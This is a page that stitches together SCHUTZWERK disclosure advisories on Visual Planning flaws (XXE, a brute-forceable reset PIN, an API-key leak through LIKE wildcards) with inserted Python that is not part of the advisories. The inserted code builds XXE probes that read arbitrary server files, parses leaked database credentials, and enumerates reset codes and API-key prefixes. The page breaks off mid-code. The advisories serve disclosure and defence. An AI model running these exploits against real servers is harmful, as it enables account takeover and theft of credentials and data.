/>==========<br /><br />[0] https://www.visual-planning.com/en/<br /><br />Disclaimer<br />==========<br /><br />The information provided in this security advisory is provided "as is" <br />and without warranty of any kind. Details of this security advisory may <br />be updated in order to provide as accurate information as possible. 
The <br />most recent version of this security advisory can be found at SCHUTZWERK <br />GmbH's website ( https://www.schutzwerk.com ).<br /><br />Additional information<br />======================<br /><br />SCHUTZWERK Advisories: https://www.schutzwerk.com/blog/tags/advisories/<br /><br />SCHUTZWERK Advisory Policy: https://www.schutzwerk.com/en/advisories/<br />-----BEGIN PGP SIGNATURE-----<br /><br />iQJOBAEBCgA4FiEEgLsg7Oj/wY3LSF87GrXfkTIXLrsFAmYF0bcaHGFkdmlzb3Jp<br />ZXNAc2NodXR6d2Vyay5jb20ACgkQGrXfkTIXLrsdwA/+MyfbZTe36+AYi9q6GJE6<br />S75Xm2aZtEM3NC5F6aMcELqFEW7LNjERmBoqfkHe+SWfgFxeCXl/XelHaNnR7HTM<br />ZZPCGwJmOI+XaraInPVdCDw1QVIdiCG4VZzE0tlnFbLBgM+OTOxcDOoG7OhzP6mm<br />ALfankzxu3AfbZhwebQtSXIQ+YqjitTsvjQGPleylqYK5CJbChsyvmMjomu/GzdO<br />sWQ25ODCVUy6VORet8yn5OkQnM2CjSkteuTdNxCzd6JUB+vQ0g5FCE5NVzkqYq21<br />YJ4Fc3PgkyAnrGefSbueL+Z/K6btM8RysJAwGahIEOdlkG8W/p09L0QQUGERT2VN<br />UO6oTi/1OyoJBV9L5umr6aHss3P92ln90UAUW2dlZOdGSB8rlXisxLC1wtFZAXH9<br />YwiGY/ACXmV1FtQQpgFxfNRyEWaltU5S0Y0bPAaW+ABSMLlK4X0Ft9E/4s4Yel2d<br />TGngEnVKcR/PKNtrJbBqPDwt98R0MdQi0QxBRaxGxAg4Yr1qex8ph6IRT7bDTm0/<br />1CKlQL7y9uvXlnFE4CO3IkKNp0ejKn3A7QEep4jit07VItIc+sRsoMnB6v54DoML<br />ZfIisDoijb3doTNieyMpgTGZTDWLwLO36IS9JiqafNCAnngExqylFX6vYQVggtRz<br />mZ2yA2/9ZfQwOawEirQtQr8=<br />=TUGM<br />-----END PGP SIGNATURE-----<br /><br />-- <br />SCHUTZWERK GmbH, Pfarrer-Weiß-Weg 12, 89077 Ulm, Germany<br />Zertifiziert / Certified ISO 27001, 9001 and TISAX<br /><br />Phone +49 731 977 191 0<br /><br />advisories@schutzwerk.com / www.schutzwerk.com<br /><br />Geschäftsführer / Managing Directors:<br />Jakob Pietzka, Michael Schäfer<br /><br />Amtsgericht Ulm / HRB 727391<br />Datenschutz / Data Protection www.schutzwerk.com/datenschutz<br /></code></pre>
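Added example, not part of the SCHUTZWERK advisory and not the vendor's code: it builds the probe message shown above for an arbitrary path, pulls the reflected file content out of the ApplicationPropertyResult (the observed response is embedded below, abridged), turns the exfiltrated .properties body into key/value pairs, and shows the server-side gate that would have stopped the probe: refusing any inbound message that carries a DOCTYPE or ENTITY declaration before it reaches the XML parser. The element names are the advisory's; build_probe, parse_properties and has_dtd are this example's own helpers.

```python
import re
import xml.etree.ElementTree as ET


def build_probe(file_path: str, entity: str = "example") -> str:
    """Client side: GetApplicationProperty with an external entity in defaultValue, in the
    message format shown above. file_path is whatever the caller wants read back."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        f'<!DOCTYPE foo [<!ENTITY {entity} SYSTEM "{file_path}"> ]>\n'
        '<com.visualplanning.query.parameters.GetApplicationProperty>\n'
        f'<defaultValue>&{entity};</defaultValue>\n'
        '<propertyName>ShowBackground</propertyName>\n'
        '<rawResult>false</rawResult>\n'
        '<section>Application</section>\n'
        '<userSession isNull="true"/>\n'
        '</com.visualplanning.query.parameters.GetApplicationProperty>\n'
    )


def extract_value(response_xml: str) -> str:
    """Read the reflected <value> element out of an ApplicationPropertyResult (the back channel)."""
    return ET.fromstring(response_xml).findtext("value") or ""


def parse_properties(text: str) -> dict:
    """Turn a Java .properties body (as exfiltrated above) into a dict; '\\:' escapes are undone."""
    props = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        props[key.strip()] = value.strip().replace("\\:", ":")
    return props


DTD_RE = re.compile(rb"<!\s*(DOCTYPE|ENTITY)\b", re.IGNORECASE)


def has_dtd(raw: bytes) -> bool:
    """Server-side gate: refuse any inbound message carrying a DTD before it reaches the XML parser.
    Same effect as configuring the parser to disallow DOCTYPE declarations."""
    return DTD_RE.search(raw) is not None


# The benign PWD request from the advisory, and the observed response to the probe (abridged)
BENIGN_REQUEST = """<?xml version="1.0" encoding="UTF-8"?>
<com.visualplanning.query.parameters.GetApplicationProperty>
<defaultValue>
</defaultValue>
<propertyName>PWD</propertyName>
<rawResult>false</rawResult>
<section>INSTALLDATA</section>
<userSession isNull="true"/>
</com.visualplanning.query.parameters.GetApplicationProperty>"""

OBSERVED_RESPONSE = r"""<?xml version="1.0" encoding="UTF-8"?>
<com.visualplanning.query.result.ApplicationPropertyResult>
<resultValues/>
<status>OK</status>
<value>#
#Tue Oct 03 15:37:33 CEST 2023
INSTALLDATA.INSTALLURL=http\://127.0.0.1\:8080/vplanning
INSTALLDATA.PORT=3306
INSTALLDATA.PROVIDERTYPE=MySQL
INSTALLDATA.PWD=ENCODE\:
INSTALLDATA.SERVER=127.0.0.1
INSTALLDATA.USER=root
</value>
</com.visualplanning.query.result.ApplicationPropertyResult>"""

if __name__ == "__main__":
    probe = build_probe(r"C:\xampp2\tomcat\webapps\vplanning\configuration\install.properties")
    print("probe rejected by DTD gate :", has_dtd(probe.encode()))
    print("benign request rejected    :", has_dtd(BENIGN_REQUEST.encode()))
    for key, value in parse_properties(extract_value(OBSERVED_RESPONSE)).items():
        print(f"  {key} = {value}")
```

For a Java service such as this one, the parser-level equivalent of has_dtd is enabling the disallow-doctype-decl feature on the DocumentBuilderFactory or SAXParserFactory (and disabling external general and parameter entities); a pre-parse byte check is a coarse but parser-independent fallback for a proprietary protocol layer that unpacks messages before handing them on.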
<pre><code>-----BEGIN PGP SIGNED MESSAGE-----<br />Hash: SHA512<br /><br />Title<br />=====<br /><br />SCHUTZWERK-SA-2023-004: Authentication Bypass via Password Reset <br />Functionality in Visual Planning<br /><br />Status<br />======<br /><br />PUBLISHED<br /><br />Version<br />=======<br /><br />1.0<br /><br />CVE reference<br />=============<br /><br />CVE-2023-49232<br /><br />Link<br />====<br /><br />https://www.schutzwerk.com/advisories/schutzwerk-sa-2023-004/<br /><br />Text-only version:<br />https://www.schutzwerk.com/advisories/SCHUTZWERK-SA-2023-004.txt<br /><br />Affected products/vendor<br />========================<br /><br />All versions prior to Visual Planning 8 (Build 240207) by STILOG I.S.T.<br /><br />Summary<br />=======<br /><br />Unauthenticated attackers can exploit a weakness in the password reset <br />functionality of the Visual Planning[0] application in order to obtain <br />access to arbitrary user accounts including administrators. In case <br />administrative (in the context of Visual Planning) accounts are <br />compromised, attackers can install malicious modules into the <br />application to take over the application server hosting the Visual <br />Planning application.<br /><br />Risk<br />====<br /><br />The application does not impose any limits on the number of guesses that <br />can be made. Attackers can therefore initiate the reset for arbitrary <br />users and automate the pin validation process until a valid pin is <br />obtained. 
The vulnerability allows unauthenticated attackers to gain <br />access to arbitrary user accounts including administrators.<br /><br />Failed pin validation attempts are not logged by the application, which <br />greatly increases the difficulty of detecting ongoing attacks.<br /><br />With administrative access to Admin Center, attackers can install <br />malicious modules containing Java code that is executed on the <br />application server, resulting in arbitrary command execution.<br /><br />The entire pin space can be enumerated in approximately one to two hours.<br /><br />Description<br />===========<br /><br />During a recent red teaming assessment, Visual Planning was identified <br />as part of the customer's internet-facing assets. The software is <br />developed by STILOG I.S.T. and provides resource management and <br />scheduling features. A security assessment conducted by SCHUTZWERK found <br />an authentication bypass in Visual Planning's password reset functionality.<br />The application Admin Center (vpadmin) communicates with the server <br />through an XML-based protocol that utilizes proprietary compression <br />methods and is transmitted via HTTP. SCHUTZWERK implemented a custom <br />proxy as part of an assessment in order to intercept and manipulate the <br />messages exchanged between application and server.<br /><br />One of the first messages sent by the Admin Center application after <br />launch is the following:<br /><br /><?xml version="1.0" encoding="UTF-8"?><br /><com.visualplanning.query.NamedMethodParameter><br /><methodName>canResetPassword</methodName><br /><rawResult>false</rawResult><br /><userSession isNull="true"/><br /><values/><br /></com.visualplanning.query.NamedMethodParameter><br /><br />In this request, the client asks the server whether it should display <br />the "Forgot your password ?" button as part of the login form. 
During <br />the assessment, the server responded as follows:<br /><br /><?xml version="1.0" encoding="UTF-8"?><br /><com.visualplanning.query.QueryResult><br /><resultValues><br /><HashtableValue><br /><key>resetPassword</key><br /><value class="java.lang.Boolean">false</value><br /></HashtableValue><br /></resultValues><br /><status>OK</status><br /></com.visualplanning.query.QueryResult><br /><br />By altering the value to "true", the password reset functionality <br />becomes accessible in the application. At this point, attackers can <br />provide the target username. This causes a request similar to the <br />following to be issued:<br /><br /><?xml version="1.0" encoding="UTF-8"?><br /><com.visualplanning.query.NamedMethodParameter><br /><methodName>sendResetPasswwd</methodName><br /><rawResult>false</rawResult><br /><userSession isNull="true"/><br /><values><br /><HashtableValue><br /><key>login</key><br /><value class="String">admin</value><br /></HashtableValue><br /></values><br /></com.visualplanning.query.NamedMethodParameter><br /><br />While handling this request, the server generates a five digit numeric <br />pin and tries to send it to the email address associated with the <br />provided username. Regardless of whether the email could be successfully <br />transmitted, the generated pin is stored in an attribute of the session <br />used while performing the reset. It should be noted that the password <br />reset request message can be sent directly without enabling the button <br />in the GUI if the message format is already known.<br /><br />To complete the reset process, the correct pin (matching the pin stored <br />in the session attribute) must be specified. 
A message similar to the <br />following is issued by the application to validate the provided pin:<br /><br /><?xml version="1.0" encoding="UTF-8"?><br /><com.visualplanning.query.NamedMethodParameter><br /><methodName>validateResetPasswwd</methodName><br /><rawResult>false</rawResult><br /><userSession isNull="true"/><br /><values><br /><HashtableValue><br /><key>login</key><br /><value class="String">admin</value><br /></HashtableValue><br /><HashtableValue><br /><key>userCode</key><br /><value class="String">58344</value><br /></HashtableValue><br /></values><br /></com.visualplanning.query.NamedMethodParameter><br /><br />When an invalid pin is provided, the server responds with the following <br />XML document:<br /><br /><?xml version="1.0" encoding="UTF-8"?><br /><com.visualplanning.query.QueryResult><br /><resultValues><br /><HashtableValue><br /><key>ERROR</key><br /><value class="String">Invalid code.</value><br /></HashtableValue><br /></resultValues><br /><status>KO</status><br /></com.visualplanning.query.QueryResult><br /><br />In case the pin is valid, the server responds with a VPUser data <br />structure similar to the following:<br /><br /><?xml version="1.0" encoding="UTF-8"?><br /><com.visualplanning.query.QueryResult><br /><resultValues><br /><HashtableValue><br /><key>vpUser</key><br /><value class="com.visualplanning.data.admin.VPUser"><br /><ID>1</ID><br /><UID>C442-53EB-B185-8804-F6BF-70AC-61C3-31BC</UID><br /><activated>true</activated><br /><comments>Super administrateur</comments><br /><email>yahd6Coo@schutzwerk.com</email><br /><expiredPasswd>false</expiredPasswd><br /><groups/><br /><imageProfilBase64></imageProfilBase64><br /><ldapSetting><br /><entityID>-1</entityID><br /></ldapSetting><br /><licenses/><br /><loginAttemps>0</loginAttemps><br /><mobilePhoneNumber></mobilePhoneNumber><br /><name>admin</name><br /><ownerID>0</ownerID><br /><phoneNumber></phoneNumber><br /><platform>VP</platform><br /><resetPasswd>true</resetPasswd><br 
/><resourceUser>false</resourceUser><br /></value><br /></HashtableValue><br /></resultValues><br /><status>OK</status><br /></com.visualplanning.query.QueryResult><br /><br />In addition, an empty password is set for the target username. Upon <br />first login after reset, a new password must be set for this user.<br /><br />Solution/Mitigation<br />===================<br /><br />The vendor suggests to update to Visual Planning 8 (Build 240207)<br /><br />Disclosure timeline<br />===================<br /><br />2023-11-01: Vulnerability discovered<br />2023-11-09: Contact vendor in order to determine security contact<br />2023-11-10: Received generic sales response from vendor<br />2023-11-14: Contacted CTO of vendor directly<br />2023-11-16: Vulnerabilities demonstrated in call with contact at vendor<br />2023-11-24: CVE assigned by Mitre<br />2023-11-24: Additional technical details provided to vendor<br />2023-12-19: Vendor informed SCHUTZWERK that work on fixing the findings <br />is in progress<br />2024-01-30: Inquired about mitigation status regarding the reported <br />vulnerabilities<br />2024-01-30: Vendor informed SCHUTZWERK that some of the issues were <br />already fixed<br />2024-03-08: Sent advisory drafts to vendor<br />2024-03-28: Received patch information and release of advisory<br /><br />Contact/Credits<br />===============<br /><br />The vulnerability was discovered during an assessment by Lennert Preuth <br />and David Brown of SCHUTZWERK GmbH.<br /><br />References<br />==========<br /><br />[0] https://www.visual-planning.com/en/<br />[1] <br />https://cheatsheetseries.owasp.org/cheatsheets/Forgot_Password_Cheat_Sheet.html<br /><br />Disclaimer<br />==========<br /><br />The information provided in this security advisory is provided "as is" <br />and without warranty of any kind. Details of this security advisory may <br />be updated in order to provide as accurate information as possible. 
The <br />most recent version of this security advisory can be found at SCHUTZWERK <br />GmbH's website ( https://www.schutzwerk.com ).<br /><br />Additional information<br />======================<br /><br />SCHUTZWERK Advisories: https://www.schutzwerk.com/blog/tags/advisories/<br /><br />SCHUTZWERK Advisory Policy: https://www.schutzwerk.com/en/advisories/<br />-----BEGIN PGP SIGNATURE-----<br /><br />iQJOBAEBCgA4FiEEgLsg7Oj/wY3LSF87GrXfkTIXLrsFAmYF0TAaHGFkdmlzb3Jp<br />ZXNAc2NodXR6d2Vyay5jb20ACgkQGrXfkTIXLrtU9xAArJL5rKh3sNRto6xC7bgj<br />660J6OALXG9O9qaJo1RHYsVo9287THvSgsPs8/YXZhFNtkccsdxRll3t3UxC3IOU<br />/h+f612I4lFlk9t0LVH2eu6r8lTw47YLbO9RKoBF0TsysJMnytuM9+BxRyd+nLVo<br />rfVxmRfUhDKf5odkDz8IeatmMMeI1e7JuGylWtVOkSxdbCsmwEbObrEsCwe74AR4<br />PKJDVb6tq03q1g5H0yq7QLCMyuN7UBc0Jb/sYkL3hu0m7JlqyCVUfNBaD1pqZvlA<br />C3b+DnrJHwAPYKr5I4pKfss5Ghh3+yIaS/UIyaIImgS6pyBDOJUHULiMKumZYHCl<br />r3YWOLAjuTUztRmsktavjgItsf2NsXnBLYMDjZuZtBd6iU7iNKQ4EdbCNt8YCN8w<br />KmU3ot2Kwjty2aLj7CBdg8Mrc4Rr3PH2PoXWxSEBMWqokoO2zWVft+5BpJ/onU2P<br />um41+KNb7h7Pf/QVkU1KOZbwAI9tgJvZn2hHXmbQov0w3s0J9dqNoJ4Eu+qVPMAx<br />+Ug9Qvo3Qh325pDEeqxUhOsPh4dHam97ouDYE3XXLlKk8rar8TjhANAHHO4uUltW<br />gikWB1VVmGy7XS9lflWE1QLqO8BBK1jZUDU21fWQeAeF64R6NXikj0tkfvjOwwt/<br />CTQ2Nugk2kdYf5d73FSO9ds=<br />=PvYR<br />-----END PGP SIGNATURE-----<br /><br />-- <br />SCHUTZWERK GmbH, Pfarrer-Weiß-Weg 12, 89077 Ulm, Germany<br />Zertifiziert / Certified ISO 27001, 9001 and TISAX<br /><br />Phone +49 731 977 191 0<br /><br />advisories@schutzwerk.com / www.schutzwerk.com<br /><br />Geschäftsführer / Managing Directors:<br />Jakob Pietzka, Michael Schäfer<br /><br />Amtsgericht Ulm / HRB 727391<br />Datenschutz / Data Protection www.schutzwerk.com/datenschutz<br /></code></pre>
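The two replies shown in the advisory differ only in their `<status>` element (KO with an ERROR entry versus OK with a VPUser payload), so a client can classify every attempt mechanically. The following Python is an added example, not SCHUTZWERK's or the vendor's code: it builds the `validateResetPasswwd` message in the shape the advisory shows, classifies a reply by its status, and enumerates a numeric code space against a constructed in-process responder. The page does not show the HTTP endpoint or transport, so the responder stands in for the server and applies no throttling or lockout; the five-digit length and digits-only alphabet are assumptions taken from the sample value 58344.

```python
import xml.etree.ElementTree as ET
from typing import Callable, Dict, Optional, Tuple

XML_DECL = '<?xml version="1.0" encoding="UTF-8"?>'

# The "Invalid code." reply exactly as the advisory shows it; used to check the classifier.
PAGE_KO_RESPONSE = XML_DECL + (
    "<com.visualplanning.query.QueryResult><resultValues><HashtableValue>"
    '<key>ERROR</key><value class="String">Invalid code.</value>'
    "</HashtableValue></resultValues><status>KO</status>"
    "</com.visualplanning.query.QueryResult>"
)


def build_validate_request(login: str, user_code: str) -> str:
    """NamedMethodParameter message in the shape the advisory shows."""
    root = ET.Element("com.visualplanning.query.NamedMethodParameter")
    ET.SubElement(root, "methodName").text = "validateResetPasswwd"
    ET.SubElement(root, "rawResult").text = "false"
    ET.SubElement(root, "userSession", isNull="true")
    values = ET.SubElement(root, "values")
    for key, value in (("login", login), ("userCode", user_code)):
        entry = ET.SubElement(values, "HashtableValue")
        ET.SubElement(entry, "key").text = key
        ET.SubElement(entry, "value", {"class": "String"}).text = value
    return XML_DECL + ET.tostring(root, encoding="unicode")


def parse_request(xml_text: str) -> Dict[str, Optional[str]]:
    """Read methodName and the login/userCode hashtable entries back out of a request."""
    root = ET.fromstring(xml_text)
    params: Dict[str, Optional[str]] = {"methodName": root.findtext("methodName")}
    for entry in root.iterfind("values/HashtableValue"):
        params[entry.findtext("key") or ""] = entry.findtext("value")
    return params


def code_accepted(response_xml: str) -> bool:
    """KO means a wrong code, OK (with a VPUser payload) means the right one."""
    return ET.fromstring(response_xml).findtext("status") == "OK"


def make_responder(reset_codes: Dict[str, str]) -> Callable[[str], str]:
    """Constructed stand-in for the server (assumption: no throttling, no lockout).
    Answers with the KO or OK document from the page depending on login/userCode."""
    def respond(request_xml: str) -> str:
        req = parse_request(request_xml)
        root = ET.Element("com.visualplanning.query.QueryResult")
        entry = ET.SubElement(ET.SubElement(root, "resultValues"), "HashtableValue")
        login = req.get("login") or ""
        if (req.get("methodName") == "validateResetPasswwd"
                and reset_codes.get(login) == req.get("userCode")):
            ET.SubElement(entry, "key").text = "vpUser"
            user = ET.SubElement(entry, "value",
                                 {"class": "com.visualplanning.data.admin.VPUser"})
            ET.SubElement(user, "name").text = login
            ET.SubElement(user, "resetPasswd").text = "true"
            ET.SubElement(root, "status").text = "OK"
        else:
            ET.SubElement(entry, "key").text = "ERROR"
            ET.SubElement(entry, "value", {"class": "String"}).text = "Invalid code."
            ET.SubElement(root, "status").text = "KO"
        return XML_DECL + ET.tostring(root, encoding="unicode")
    return respond


def enumerate_reset_code(send: Callable[[str], str], login: str,
                         digits: int = 5) -> Tuple[Optional[str], int]:
    """Try every zero-padded code in ascending order. Returns (code, attempts);
    (None, 10**digits) when nothing in the space is accepted."""
    space = 10 ** digits
    for n in range(space):
        code = f"{n:0{digits}d}"
        if code_accepted(send(build_validate_request(login, code))):
            return code, n + 1
    return None, space


if __name__ == "__main__":
    send = make_responder({"admin": "58344"})   # code value taken from the page's sample
    code, attempts = enumerate_reset_code(send, "admin")
    print(f"code {code} accepted after {attempts} of {10 ** 5} possible values")
```

A five-digit numeric code bounds the search at 100,000 requests, so the distinguishable KO/OK reply is what makes the code recoverable; the OWASP cheat sheet cited as [1] covers the countermeasures (longer random tokens, expiry, rate limiting and lockout) that this example deliberately leaves out of the responder.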
<pre><code>-----BEGIN PGP SIGNED MESSAGE-----<br />Hash: SHA512<br /><br />Title<br />=====<br /><br />SCHUTZWERK-SA-2023-003: Authentication Bypass in Visual Planning REST API<br /><br />Status<br />======<br /><br />PUBLISHED<br /><br />Version<br />=======<br /><br />1.0<br /><br />CVE reference<br />=============<br /><br />CVE-2023-49231<br /><br />Link<br />====<br /><br />https://www.schutzwerk.com/advisories/schutzwerk-sa-2023-003/<br /><br />Text-only version:<br />https://www.schutzwerk.com/advisories/SCHUTZWERK-SA-2023-003.txt<br /><br />Affected products/vendor<br />========================<br /><br />All versions prior to Visual Planning 8 (Build 240207) by STILOG I.S.T.<br /><br />Summary<br />=======<br /><br />A wildcard injection inside a prepared SQL statement was found in an <br />undocumented Visual Planning[0] 8 REST API route. The combination of <br />fuzzy matching (via the LIKE operator) and user-controlled input allows <br />exfiltrating the REST API key based on distinguishable server responses. <br />If exploited, attackers are able to gain administrative access to the <br />REST API v2.0.<br /><br />Risk<br />====<br /><br />The vulnerability allows attackers to obtain a valid API key for the <br />Visual Planning REST API v2.0. With such a key, attackers can use <br />corresponding endpoints to exfiltrate company data or upload/download <br />files. If no external user management (e.g. LDAP) is configured, the API <br />key can also be used for user management tasks including the creation of <br />administrative users. Since administrators are allowed to upload modules <br />using the Visual Planning Admin Center, a compromise of the underlying <br />server is likely.<br /><br />Description<br />===========<br /><br />During a recent red teaming assessment, Visual Planning was identified <br />as part of the customer's internet-facing assets. The software is <br />developed by STILOG I.S.T. 
and provides resource management and <br />scheduling features. A security assessment conducted by SCHUTZWERK found <br />an authentication bypass in Visual Planning's administrative REST API <br />v2.0.[1]<br /><br />Corresponding API routes are implemented in the PlanningWSRestV2.java <br />file. A comparison between the documentation and implemented routes <br />revealed an undocumented route (documentation accessed on 2024-03-05), <br />which is externally reachable via a GET request to the /session endpoint.<br /><br />The following code snippet shows the corresponding undocumented route, <br />which takes the value of the apikey header as an argument:<br /><br />vp.jar.src/com/visualplanning/webservice/PlanningWSRestV2.java<br />/*     */   @GET<br />/*     */   @Path("/session")<br />/*     */   public Response openSession(@HeaderParam("apikey") String apikey, @HeaderParam("keepalive") String keepalive) {<br />/* 123 */     if (apikey == null || apikey.trim().isEmpty()) {<br />/* 124 */       return WSResponse.instance().errorApikey((Response.StatusType)Response.Status.FORBIDDEN, apikey);<br />/*     */     }<br />/*     */<br />/* 127 */     WSSession session = WSSession.existsSession(apikey);<br />/* 128 */     if (session != null) {<br />/* 129 */       return WSResponse.instance().error((Response.StatusType)Response.Status.FORBIDDEN, "Already opened session for apikey : ", apikey);<br />/*     */     }<br />/*     */<br />/* 132 */     if (WSSession.getSession(apikey, (keepalive != null && Boolean.parseBoolean(keepalive) == true)) == null) {<br />/* 133 */       return WSResponse.instance().errorApikey((Response.StatusType)Response.Status.FORBIDDEN, apikey);<br />/*     */     }<br />/* 135 */     return WSResponse.instance().success("WSSession created for apikey : " + apikey);<br />/*     */   }<br /><br />Line 132 shows a call to the getSession(apikey, ...) method of the <br />WSSession class. Subsequently, the getSession(..) method will call the <br />makeSession(apikey, ..) method of the same class.<br /><br />The following code snippet shows the makeSession(..) method. Line 646 <br />contains the vulnerable prepared SQL statement, which is prone to <br />wildcard injections[2] due to the usage of the LIKE operator in <br />combination with user-controlled input:<br /><br />vp.jar.src/com/visualplanning/webservice/WSSession.java<br />/*     */   private static WSSession makeSession(String apiKey, WSSessionType type) {<br />/* 634 */     WSSession wsSession = new WSSession();<br />/* 635 */     WebApplicationContext applicationContext = WebApplicationContext.getDefaultApplication();<br />/* 636 */     UserSession userSession = applicationContext.createUserSession();<br />/*     */<br />/* 638 */     DBConnection connection = applicationContext.createUserSession().getDBConnection();<br />/* 639 */     String databaseName = applicationContext.getProperty("Application", "Databasename", "VisualPlanning7");<br />/*     */<br />/* 641 */     connection.setPoolMode(false);<br />/* 642 */     connection.setDatabase(databaseName);<br />/*     */<br />/*     */     try {<br />/* 645 */       if (type == WSSessionType.CLIENT) {<br />/* 646 */         String planningQuery = "SELECT XMLContent FROM Planning WHERE XMLContent LIKE ?";<br />/* 647 */         PreparedStatement stmt = connection.createPreparedStatement(planningQuery);<br />/* 648 */         stmt.setString(1, "%<APIKey>" + apiKey + "</APIKey>%");<br />/* 649 */         ResultSet rs = stmt.executeQuery();<br />/*     */<br />/* 651 */         if (!rs.next()) {<br />/* 652 */           return null;<br />/*     */         }<br /><br /><br />The following GET request demonstrates the behavior of injecting a <br />percent sign as wildcard character:<br /><br />GET /vplanning/api/v2/session HTTP/1.1<br />Host: vp-host<br />apikey: %<br />[..]<br /><br />The server will respond with a success message, indicating that a <br />session was created for the used API key:<br /><br />HTTP/1.1 200<br />[..]<br /><br />WSSession created for apikey : %<br /><br />Further tests 
showed that an apikey header payload of '1%' will result <br />in a similar success response if the API key starts with the character <br />'1'. A payload with a non-matching first character such as '2%' will <br />result in status code 403 and the error message 'Invalid API key (2%)'.<br /><br />The proof-of-concept script brute_vp_apikey.py[3] was developed to <br />automate the process of exfiltrating the full API key. It can be <br />executed as follows against a vulnerable Visual Planning instance to <br />extract the administrative API key:<br /><br />$ python3 brute_vp_apikey.py --url http://127.0.0.1:8080<br />Visual Planning API Key: 79d4add3-6995-8cae-976b-4aaaddd90616<br /><br />Solution/Mitigation<br />===================<br /><br />The vendor suggests updating to Visual Planning 8 (Build 240207).<br /><br />Disclosure timeline<br />===================<br /><br />2023-11-01: Vulnerability discovered<br />2023-11-09: Contacted vendor to determine security contact<br />2023-11-10: Received generic sales response from vendor<br />2023-11-14: Contacted CTO of vendor directly<br />2023-11-16: Vulnerabilities demonstrated in call with contact at vendor<br />2023-11-24: CVE assigned by Mitre<br />2023-11-24: Additional technical details provided to vendor<br />2023-12-19: Vendor informed SCHUTZWERK that work on fixing the findings <br />is in progress<br />2024-01-30: Inquired about mitigation status regarding the reported <br />vulnerabilities<br />2024-01-30: Vendor informed SCHUTZWERK that some of the issues were <br />already fixed<br />2024-03-08: Sent advisory drafts to vendor<br />2024-03-28: Received patch information and release of advisory<br /><br />Contact/Credits<br />===============<br /><br />The vulnerability was discovered by Lennert Preuth of SCHUTZWERK GmbH.<br /><br />References<br />==========<br /><br />[0] https://www.visual-planning.com/en/<br />[1] <br 
/>https://app.swaggerhub.com/apis-docs/VisualPlanning/visual-planning_api_rest_v_2_0_us/2.0-oas3<br />[2] <br />https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_SQL_Injection#sql-wildcard-injection<br />[3] https://www.schutzwerk.com/en/43/assets/advisories/brute_vp_apikey.py<br /><br />Disclaimer<br />==========<br /><br />The information provided in this security advisory is provided "as is" <br />and without warranty of any kind. Details of this security advisory may <br />be updated in order to provide as accurate information as possible. The <br />most recent version of this security advisory can be found at SCHUTZWERK <br />GmbH's website ( https://www.schutzwerk.com ).<br /><br />Additional information<br />======================<br /><br />SCHUTZWERK Advisories: https://www.schutzwerk.com/blog/tags/advisories/<br /><br />SCHUTZWERK Advisory Policy: https://www.schutzwerk.com/en/advisories/<br />-----BEGIN PGP SIGNATURE-----<br /><br />iQJOBAEBCgA4FiEEgLsg7Oj/wY3LSF87GrXfkTIXLrsFAmYF0QkaHGFkdmlzb3Jp<br />ZXNAc2NodXR6d2Vyay5jb20ACgkQGrXfkTIXLrvAZhAArh5MI5kM1lTjcIPPMiDS<br />VXJ51Z39qgcXySyrqrKslnP/2a/pfpakD8g161oOTSK/tt9Yd6L/6O5Vywe7Kx5V<br />lkVw7bs9J0WCY8aYzJ9RxdALt7HexAG+USgbjFWFajdSNNJ8giBu3P3ZCE8/GbHJ<br />0bKd8AN88NKL954olnI6qGbbnOr/QXWuIOWAYF9wXLgEk992hszYgt7SJIrFHuX6<br />2TC4iWOv4+72HQiQ8QYXCAZZVBDr3mUPQRBSJ9AZ3x7mxtJtMg8DyW0OATNe9Qlq<br />IUO7HFqrPwTQmFKf9whk8QD7/Y9dKTpAjlVzvXe49COqbjOzxmIe7muxwyVlOrqO<br />J9ZqreOr/ENLUgYDBaTLSTAHdEFNeqRGPK3dG0yiRSi3dtavJwr8PN1L52qTqLzT<br />C+Yrruu6Ac6pSin1Ea9WaXF+YS1ErRcbZxkRD5pS4s6V4NMkV4bDWlDtraQ0rDfL<br />AA+TxtA25p34S2MV/b3qAiA66UjrXEb6IJVNx4Rx7X3+gcLgI2w7t3DQEVuPaB3k<br />ltT1oV6ei7tqeQpn7usHzlfa6lq7Q3PIRpxYAo0g4kp4cVVblLRNWDpZMK+cBj1N<br />MrGP2f50gbpYej/yYHsXNU2pMfbUPoSq3X8uwVCoLvaBSBWx7I3TM1hl0/3wBi/w<br />phO+Bauh2QYGX2mFw/mduZM=<br />=ycwQ<br />-----END PGP SIGNATURE-----<br /><br />-- <br />SCHUTZWERK GmbH, 
Pfarrer-Weiß-Weg 12, 89077 Ulm, Germany<br />Zertifiziert / Certified ISO 27001, 9001 and TISAX<br /><br />Phone +49 731 977 191 0<br /><br />advisories@schutzwerk.com / www.schutzwerk.com<br /><br />Geschäftsführer / Managing Directors:<br />Jakob Pietzka, Michael Schäfer<br /><br />Amtsgericht Ulm / HRB 727391<br />Datenschutz / Data Protection www.schutzwerk.com/datenschutz<br /></code></pre>
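The prefix oracle described in the advisory (a '1%' payload succeeds only when the stored key starts with '1') generalizes to recovering the whole key one character at a time, and the same LIKE semantics give away the key length through the single-character wildcard '_'. The following Python/sqlite3 example is added here and is not the advisory's brute_vp_apikey.py or the vendor's code: it reproduces the makeSession() query against a constructed Planning table, recovers the key through the wildcards, and shows the hardened form of the same query, which escapes '%' and '_' in the bound value and names the escape character with an ESCAPE clause. The table layout, the in-memory SQLite database and the hex-plus-dash key alphabet (taken from the key format in the PoC output) are assumptions; the sample key is the value printed by the PoC on the page.

```python
import sqlite3
from typing import Callable, Optional

# Constructed sample data. Only the "<APIKey>...</APIKey>" substring that
# makeSession() searches for comes from the advisory; the table shape does not.
SAMPLE_API_KEY = "79d4add3-6995-8cae-976b-4aaaddd90616"
KEY_ALPHABET = "0123456789abcdef-"   # assumption based on the UUID-style key format

Oracle = Callable[[str], bool]


def make_db(api_key: str) -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Planning (XMLContent TEXT)")
    conn.execute("INSERT INTO Planning VALUES (?)",
                 (f"<Planning><APIKey>{api_key}</APIKey></Planning>",))
    return conn


def session_exists_vulnerable(conn: sqlite3.Connection, api_key: str) -> bool:
    """Same query and parameter construction as WSSession.makeSession(). The value
    is bound, so this is not classic SQL injection, but LIKE still interprets
    % and _ inside the bound value as wildcards."""
    row = conn.execute("SELECT XMLContent FROM Planning WHERE XMLContent LIKE ?",
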